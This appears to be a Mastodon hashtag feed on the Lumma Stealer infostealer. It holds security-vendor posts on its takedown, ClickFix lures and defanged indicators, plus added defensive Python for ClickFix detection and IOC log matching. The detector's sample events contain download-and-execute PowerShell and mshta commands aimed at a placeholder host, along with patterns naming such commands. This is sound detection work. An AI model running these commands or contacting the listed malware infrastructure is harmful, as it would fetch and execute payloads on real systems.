#LummaStealer

1 post · 1 participant · 0 posts today
ESET Research<p><a href="https://infosec.exchange/tags/ESETresearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETresearch</span></a> joins Europol’s Cyber Intelligence Extension Programme (CIEP) 🤝 We are proud to announce ESET’s participation in the pilot phase of CIEP, a new initiative launched by Europol’s European Cybercrime Centre (EC3).<br>The program aims to strengthen public-private cooperation in the fight against cybercrime by enabling real-time collaboration and intelligence sharing. ESET Chief Research Officer Roman Kovac &amp; Senior Malware Researcher Jakub Soucek spent several days at Europol’s HQ.<br>ESET has already cooperated in EC3's Advisory Group, where we are represented by ESET Senior Research Fellow Righard Zwienenberg. ESET has also contributed to successful law enforcement operations: <a href="https://infosec.exchange/tags/Gamarue" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Gamarue</span></a>, <a href="https://infosec.exchange/tags/RedLine" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RedLine</span></a>, <a href="https://infosec.exchange/tags/Grandoreiro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Grandoreiro</span></a>, <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a>, <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a>.<br>The new CIEP initiative elevates this collaboration further, creating opportunities for direct, real-time engagement with Europol’s operational teams. Partnerships like this one are crucial in mitigating risks within today's rapidly evolving cyber threat landscape. <br>Cyber threats evolve rapidly, but through these partnerships, so does our collective defense. Together we can make Europe a safer place. 🤝</p>
OTX Bot<p>FAKE TELEGRAM PREMIUM SITE DISTRIBUTES NEW LUMMA STEALER VARIANT</p><p>A malicious campaign using the domain 'telegrampremium[.]app' is distributing a new variant of Lumma Stealer malware. The fake site mimics the official Telegram Premium platform and automatically downloads an executable file 'start.exe' upon access. This sophisticated information-stealing trojan can exfiltrate browser credentials, cryptocurrency wallet details, and system information. The malware employs various techniques for persistence, defense evasion, and data theft, including file system manipulation, registry modification, and clipboard operations. The campaign highlights the ongoing use of brand impersonation and social engineering for large-scale malware distribution, emphasizing the need for robust security measures and user awareness.</p><p>Pulse ID: 688ee51c244879cbcd8b5826<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/688ee51c244879cbcd8b5826" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/688ee</span><span class="invisible">51c244879cbcd8b5826</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-08-03 04:27:08</p><p>Be advised, this data is unverified and should be considered preliminary. 
Always do further verification.</p><p><a href="https://social.raytec.co/tags/Browser" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Browser</span></a> <a href="https://social.raytec.co/tags/Clipboard" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Clipboard</span></a> <a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/DataTheft" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DataTheft</span></a> <a href="https://social.raytec.co/tags/ICS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ICS</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/Mimic" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Mimic</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> <a href="https://social.raytec.co/tags/SocialEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialEngineering</span></a> <a href="https://social.raytec.co/tags/Telegram" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Telegram</span></a> <a href="https://social.raytec.co/tags/Trojan" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Trojan</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/cryptocurrency" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cryptocurrency</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AlienVault</span></a></p>
abuse.ch :verified:<p>We've observed an interesting infection chain ⛓️ in the wild, starting with <a href="https://ioc.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> spread through a fake gaming website and resulting in <a href="https://ioc.exchange/tags/Latrodectus" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Latrodectus</span></a> and <a href="https://ioc.exchange/tags/SectopRat" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SectopRat</span></a> 🪲🔍👀</p><p>See below for more ⬇️</p>
The Threat Codex<p>Bulletproof Hosting Hunt - Connecting the dots from Lumma to Qwins Ltd (ASN 213702)<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/AS213702" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AS213702</span></a><br><a href="https://intelinsights.substack.com/p/bulletproof-hosting-hunt" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelinsights.substack.com/p/b</span><span class="invisible">ulletproof-hosting-hunt</span></a></p>
The Threat Codex<p>Back to Business: Lumma Stealer Returns with Stealthier Methods<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <br><a href="https://www.trendmicro.com/en_us/research/25/g/lumma-stealer-returns.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">trendmicro.com/en_us/research/</span><span class="invisible">25/g/lumma-stealer-returns.html</span></a></p>
Pyrzout :vm:<p>Lumma Stealer Malware Returns After Takedown Attempt <a href="https://www.securityweek.com/lumma-stealer-malware-returns-after-takedown-attempt/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">securityweek.com/lumma-stealer</span><span class="invisible">-malware-returns-after-takedown-attempt/</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a>&amp;Threats <a href="https://social.skynetcloud.site/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.skynetcloud.site/tags/takedown" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>takedown</span></a> <a href="https://social.skynetcloud.site/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://social.skynetcloud.site/tags/Resurge" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Resurge</span></a> <a href="https://social.skynetcloud.site/tags/return" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>return</span></a></p>
OTX Bot<p>Back to Business: Lumma Stealer Returns with Stealthier Methods</p><p>Lumma Stealer, an information-stealing malware, has resurfaced shortly after its takedown in May 2025. The cybercriminals behind it are now employing more covert tactics and expanding their reach. The malware is being distributed through discreet channels and uses stealthier evasion techniques. Lumma Stealer can steal sensitive data such as credentials and private files, and is marketed as a malware-as-a-service. Users are lured to download it through fake cracked software, deceptive websites, and social media posts. The malware's infrastructure has been diversified, with a shift towards using Russian-based cloud services. Recent campaigns include fake crack downloads, ClickFix campaigns using fake CAPTCHA pages, GitHub repository abuse, and social media promotions.</p><p>Pulse ID: 688096076e36d7d6fea700fa<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/688096076e36d7d6fea700fa" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/68809</span><span class="invisible">6076e36d7d6fea700fa</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-07-23 07:57:59</p><p>Be advised, this data is unverified and should be considered preliminary. 
Always do further verification.</p><p><a href="https://social.raytec.co/tags/CAPTCHA" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CAPTCHA</span></a> <a href="https://social.raytec.co/tags/Cloud" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cloud</span></a> <a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/GitHub" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>GitHub</span></a> <a href="https://social.raytec.co/tags/ICS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ICS</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/MalwareAsAService" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAsAService</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/Russia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Russia</span></a> <a href="https://social.raytec.co/tags/SocialMedia" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialMedia</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AlienVault</span></a></p>
ESET Research<p><a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> went from virtually non-existent to the second most common attack vector blocked by <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a>, surpassed only by <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>phishing</span></a>. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. <a href="https://infosec.exchange/tags/ESETresearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETresearch</span></a><br>ClickFix lures users by displaying bogus error messages followed by quick fix instructions, including copy-pasting malicious code. Running the code in the victim’s command line interpreter delivers malware such as <a href="https://infosec.exchange/tags/RATs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RATs</span></a>, infostealers, and cryptominers.<br>Between H2 2024 and H1 2025, ESET’s detection for ClickFix, HTML/FakeCaptcha, skyrocketed by 517%. Most detections in ESET telemetry were reported from Japan (23%), Peru (6%), and Poland, Spain, and Slovakia (&gt;5% each).<br>What makes <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> so effective? The fake error message looks convincing; instructions are simple, yet the copied command is too technical for most users to understand. 
Pasting it into cmd leads to compromise with final payloads, including <a href="https://infosec.exchange/tags/DarkGate" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DarkGate</span></a> or <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a>. <br>While <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> was introduced by cybercriminals, it’s since been adopted by APT groups: Kimsuky, Lazarus; Callisto, Sednit; MuddyWater; APT36. NK-aligned actors used it to target developers, steal crypto and passwords from Metamask and <a href="https://infosec.exchange/tags/macOS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>macOS</span></a> Keychain. <br><a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> uses psychological manipulation by presenting fake issues and offering quick solutions, which makes it dangerously efficient. It appears in many forms – error popups, email attachments, fake reCAPTCHAs – highlighting the need for greater vigilance online.<br>Read more in the <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>:<br>🔗 <a href="https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">welivesecurity.com/en/eset-res</span><span class="invisible">earch/eset-threat-report-h1-2025</span></a></p>
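The ESET post above describes the ClickFix chain in words: a bogus error or fake CAPTCHA page, a command the victim copies, and a paste into cmd or PowerShell that pulls down the payload. As an added example (not part of the post, and not ESET's own detection logic), the Python below scores process-creation events for that pattern: an interpreter or script host spawned from the desktop shell with a command line that fetches remote content, hides its window, or executes it in memory. Field names, weights, the threshold and the sample events are assumptions made for illustration; the fake-CAPTCHA marker text is a commonly reported artifact, treated here as an assumption rather than something the post states.

```python
"""Heuristic ClickFix detection over process-creation events.

Added example, not from the ESET post and not ESET's detection logic.
Event fields mimic Sysmon Event ID 1 (Image, ParentImage, CommandLine);
weights, threshold and sample events are illustrative assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str   # command line as logged


# Interpreters that ClickFix lures tell the victim to paste into
# (Run dialog, cmd, PowerShell, or a script host).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}

# A desktop shell as parent suggests a human pasted the command,
# rather than a service, scheduler or management agent launching it.
INTERACTIVE_PARENTS = {"explorer.exe"}

# (regex, weight, reason). Each captures one trait of a pasted lure:
# fetch remote content, hide the window, execute in memory, and the
# fake-CAPTCHA "verification" string often left in the command (assumed).
PATTERNS = [
    (re.compile(r"-(?:enc|encodedcommand|ec)\b", re.I), 3, "encoded PowerShell command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b", re.I), 2, "remote download cmdlet"),
    (re.compile(r"https?://", re.I), 2, "URL in command line"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3, "in-memory execution"),
    (re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I), 4, "mshta loading remote HTA"),
    (re.compile(r"✅|I am not a robot|verification id", re.I), 4, "fake CAPTCHA marker text (assumed)"),
]

THRESHOLD = 6  # illustrative; tune against your own telemetry


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent):
    """Return (score, reasons) for one event; non-interpreters score 0."""
    if basename(ev.image) not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    parent = basename(ev.parent_image)
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"interactive parent {parent}")
    for rx, weight, reason in PATTERNS:
        if rx.search(ev.command_line):
            score += weight
            reasons.append(reason)
    return score, reasons


def find_clickfix(events):
    """Return [(event, score, reasons)] for events at or above THRESHOLD."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= THRESHOLD:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample events (not real telemetry). Two lure-style
# launches, one legitimate management script, one harmless cmd.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -w hidden -c "iwr http://lure.invalid/a.txt | iex" '
              '# ✅ I am not a robot - reCAPTCHA Verification ID: 7811'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta https://lure.invalid/v.hta"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Vendor\agent.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              'cmd /c "dir C:\\Users"'),
]

if __name__ == "__main__":
    for ev, score, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"{score:2d}  {basename(ev.image)}  {', '.join(reasons)}")
```

The parent-process check is what separates a pasted lure from routine automation: the agent-launched script in the third sample scores zero even with an execution-policy bypass, while the two explorer.exe children that reach out to a URL cross the threshold. In production the same scoring would run over your EDR or Sysmon feed, with the marker-text rule expected to age fastest.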
Brad<p>2025-07-15 (Tuesday): <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection with <a href="https://infosec.exchange/tags/SecTopRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecTopRAT</span></a>. </p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> of the <a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> traffic and <a href="https://infosec.exchange/tags/SecTop" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecTop</span></a> <a href="https://infosec.exchange/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> activity, the <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>/artifacts from an infection, and the associated IOCs are available at <a href="https://www.malware-traffic-analysis.net/2025/07/15/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/07/15/index.html</span></a></p>
ESET Research<p>In May 2025, <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> participated in operations that largely disrupted the infrastructure of two notorious infostealers: <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> and <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a>. <br>As part of the Lumma Stealer disruption effort, carried out in conjunction with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry, ESET supplied technical analysis and statistical information. <br>Danabot was targeted by the <a href="https://infosec.exchange/tags/FBI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FBI</span></a> and <a href="https://infosec.exchange/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a>, alongside <a href="https://infosec.exchange/tags/OperationEndgame" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OperationEndgame</span></a> led by <a href="https://infosec.exchange/tags/Europol" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Europol</span></a> and <a href="https://infosec.exchange/tags/Eurojust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Eurojust</span></a>. ESET participated together with several other companies. We provided the analysis of the malware’s backend infrastructure and identified its C&amp;C servers. 
<br>Before these takedowns, both infostealers were on the rise: in H1 2025, Lumma Stealer detections grew by 21%, while Danabot’s numbers increased by more than 50%.<br>For a time, Lumma Stealer was the primary payload of the HTML/FakeCaptcha trojan, used in the <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> social engineering attacks that we also cover in this issue of the <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>. In recent months, we have seen Danabot being delivered via ClickFix as well. <br>For more details on these two operations and on the ClickFix attacks, read the latest <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>: <a href="https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">welivesecurity.com/en/eset-res</span><span class="invisible">earch/eset-threat-report-h1-2025</span></a></p>
Pyrzout :vm:<p>Hackers weaponize Shellter red teaming tool to spread infostealers – Source: securityaffairs.com <a href="https://ciso2ciso.com/hackers-weaponize-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/hackers-weaponiz</span><span class="invisible">e-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/informationsecuritynews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>informationsecuritynews</span></a> <a href="https://social.skynetcloud.site/tags/ITInformationSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ITInformationSecurity</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairscom" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairscom</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/PierluigiPaganini" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PierluigiPaganini</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairs</span></a> <a href="https://social.skynetcloud.site/tags/BreakingNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BreakingNews</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/hackingnews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hackingnews</span></a> <a href="https://social.skynetcloud.site/tags/Cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cybercrime</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/SHELLTER" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SHELLTER</span></a> <a href="https://social.skynetcloud.site/tags/hacking" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hacking</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a></p>
Brad<p>2025-07-02 (Wednesday): Another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection with follow-up <a href="https://infosec.exchange/tags/Rsockstun" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Rsockstun</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>The <a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> Stealer infection uses a password-protected 7-zip archive, a Nullsoft installer, and <a href="https://infosec.exchange/tags/AutoItv3" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AutoItv3</span></a>. </p><p>Malware samples, a <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> and some IOCs are available at <a href="https://www.malware-traffic-analysis.net/2025/07/02/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/07/02/index.html</span></a></p>
Brad<p>2025-06-27 (Friday): I ran another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection today. It was basically the same as yesterday, except for the follow-up malware.</p><p>I saw the same URL for hxxp[:]//86.54.25[.]40/sok.exe, but it returned a different file.</p><p>It generated the same type of C2 traffic over TCP port 16443, but it used a different domain for the C2 server at eset-blacklist[.]net. </p><p>Sample:</p><p>- <a href="https://bazaar.abuse.ch/sample/9dc1872510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">bazaar.abuse.ch/sample/9dc1872</span><span class="invisible">510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/</span></a></p><p>Sandbox analysis:</p><p>- <a href="https://www.joesandbox.com/analysis/1724473" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">joesandbox.com/analysis/1724473</span><span class="invisible"></span></a></p><p>- <a href="https://tria.ge/250627-26apgask14" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">tria.ge/250627-26apgask14</span><span class="invisible"></span></a></p><p>- <a href="https://app.any.run/tasks/651d4998-807d-4ac2-821b-88061c288013" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/651d4998-807</span><span class="invisible">d-4ac2-821b-88061c288013</span></a></p>
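The OTX post earlier on this page quotes the fake-site domain telegrampremium[.]app, and the post directly above quotes the payload URL hxxp[:]//86.54.25[.]40/sok.exe and the C2 domain eset-blacklist[.]net, all defanged so they cannot be clicked. Before any of them can be searched for in DNS or proxy logs they have to be refanged, and a naive substring search will then either miss subdomains or match unrelated names. The Python below, added here as an example and not part of either post or of their tooling, refangs the three indicators as posted and matches them against log lines; the log format and the log lines themselves are constructed for illustration.

```python
"""Refang defanged indicators and match them against log lines.

Added example; not part of the OTX or malware-traffic-analysis posts and
not their tooling. The three indicators are quoted from those posts;
the log format and log lines are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Indicators exactly as posted (defanged so they cannot be clicked).
DEFANGED_IOCS = [
    "telegrampremium[.]app",            # fake Telegram Premium site
    "hxxp[:]//86.54.25[.]40/sok.exe",   # Lumma follow-up payload URL
    "eset-blacklist[.]net",             # follow-up malware C2 domain
]

# Hostname or dotted IPv4 tokens inside an arbitrary log line.
HOST_TOKEN = re.compile(
    r"\b(?:\d{1,3}(?:\.\d{1,3}){3}"
    r"|[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+)\b",
    re.I,
)


def refang(ioc: str) -> str:
    """Undo common defanging: hxxp -> http, [.] (.) {.} -> ., [:] -> :."""
    ioc = re.sub(r"^hxxp", "http", ioc, flags=re.I)
    for broken, fixed in (("[.]", "."), ("(.)", "."), ("{.}", "."), ("[:]", ":")):
        ioc = ioc.replace(broken, fixed)
    return ioc


def host_of(ioc: str) -> str:
    """Host (domain or IP) of a refanged URL or bare host, lower-cased."""
    if "://" in ioc:
        return (urlsplit(ioc).hostname or "").lower()
    return ioc.split("/", 1)[0].lower()


def build_matcher(defanged):
    """Split indicators into a host set and a full-URL set."""
    hosts, urls = set(), set()
    for d in defanged:
        r = refang(d)
        hosts.add(host_of(r))
        if "://" in r:
            urls.add(r.lower())
    return hosts, urls


def match_line(line: str, hosts, urls):
    """Return the indicator this line hits, or None.

    A full-URL indicator must appear verbatim; a host indicator matches
    the host itself or any subdomain of it, never a substring of an
    unrelated name (tokens are compared whole).
    """
    low = line.lower()
    for url in urls:
        if url in low:
            return url
    for tok in HOST_TOKEN.findall(low):
        for host in hosts:
            if tok == host or tok.endswith("." + host):
                return host
    return None


def scan(lines, defanged=DEFANGED_IOCS):
    """Return [(line_number, indicator)] for every matching line."""
    hosts, urls = build_matcher(defanged)
    hits = []
    for number, line in enumerate(lines, 1):
        hit = match_line(line, hosts, urls)
        if hit:
            hits.append((number, hit))
    return hits


# Constructed DNS/proxy log lines (not from either post's pcap).
SAMPLE_LOGS = [
    "2025-08-03T04:31:10Z dns   10.0.0.15 query A telegrampremium.app",
    "2025-08-03T04:31:12Z proxy 10.0.0.15 GET https://telegrampremium.app/start.exe 200",
    "2025-08-03T04:40:00Z proxy 10.0.0.22 GET https://example.org/ 200",
    "2025-06-27T13:02:44Z proxy 10.0.0.9  GET http://86.54.25.40/sok.exe 200",
    "2025-06-27T13:03:01Z dns   10.0.0.9  query A cdn.eset-blacklist.net",
    "2025-06-27T13:05:00Z dns   10.0.0.9  query A eset.com",
]

if __name__ == "__main__":
    for number, indicator in scan(SAMPLE_LOGS):
        print(f"line {number}: {indicator}")
```

Two details matter in practice: the URL indicator is only reported on an exact match, because the post above notes that the same URL later served a different file, so the URL and not the file is the stable indicator; and the domain match is token-based, so a look-alike such as eset.com does not trip on eset-blacklist.net while a subdomain of the C2 domain still does.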
